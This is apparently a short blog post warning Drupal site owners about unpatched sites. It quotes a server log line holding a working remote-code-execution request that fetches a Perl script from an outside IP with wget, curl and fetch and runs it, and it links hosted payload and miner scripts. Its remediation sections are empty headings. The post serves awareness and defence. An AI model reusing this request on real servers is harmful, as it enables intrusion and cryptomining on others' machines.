What is this article about?

I will talk about what happens when you do not update your Drupal website core and contributed modules.

What does this document cover?

Why it is important to update your Drupal website?

Drupal is an open source project. Everyone can see it’s vulnerabilities. And I think the worst thing about it is that when a security update arrives, you have to update your site asap because the hackers will know what the vulnerability is covering even if they did not know about it. So, it’s a shout-out to the hackers and telling them, “look, if the site is not updated, this is how you hack it”.

How do they get into your server?

Most people who call themselves hackers are very very small and disgusting people. The way that they “hack” your site is so childish, you wouldn’t believe to what level they can drop themselves to. Here is one of the ways:

162.158.102.97 - - [15/May/2018:11:54:02 +0200] "POST /?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=cd+/var/tmp/+;+cd+/tmp/+;+rm+-rf+maxx2.txt+;+wget+http://195.22.126.117/maxx2.txt+;+mv+maxx2.txt+wget.txt+;+perl+wget.txt+195.22.127.225+;+lwp-download+http://195.22.126.117/maxx2.txt+;+mv+maxx2.txt+lynx.txt+;+perl+lynx.txt+195.22.127.225+;+fetch+http://195.22.126.117/maxx2.txt+;+mv+maxx2.txt+fetch.txt+;+perl+fetch.txt+195.22.127.225+;+curl+-O+http://195.22.126.117/maxx2.txt+;+mv+maxx2.txt+curl.txt+;+perl+curl.txt+195.22.127.225+;+rm+-rf+maxx2.txt+wget.txt+lynx.txt+fetch.txt+curl.txt HTTP/1.1" 301 817 "-" "curl/7.35.0"

Look at that request. You need to have serious problems to get that level. Anyways, and this is what happens next:

They upload this code here http://195.22.126.117/maxx2.txt to your server. Then, by executing some commands they create a jpg file which is basically a script and in the end they create /var/tmp/refresh script. You can see the script here: http://206.189.151.79:8080/refresh

That script runs bitcoin miners in your server. I mean, is that even a thing? The chances to find a bitcoin block by a CPU miner for a year long on a tiny unix server is 170.000.000. I am telling you, whoever is doing this, is a teenager.

How to fix your hacked drupal site?

How can I secure my server?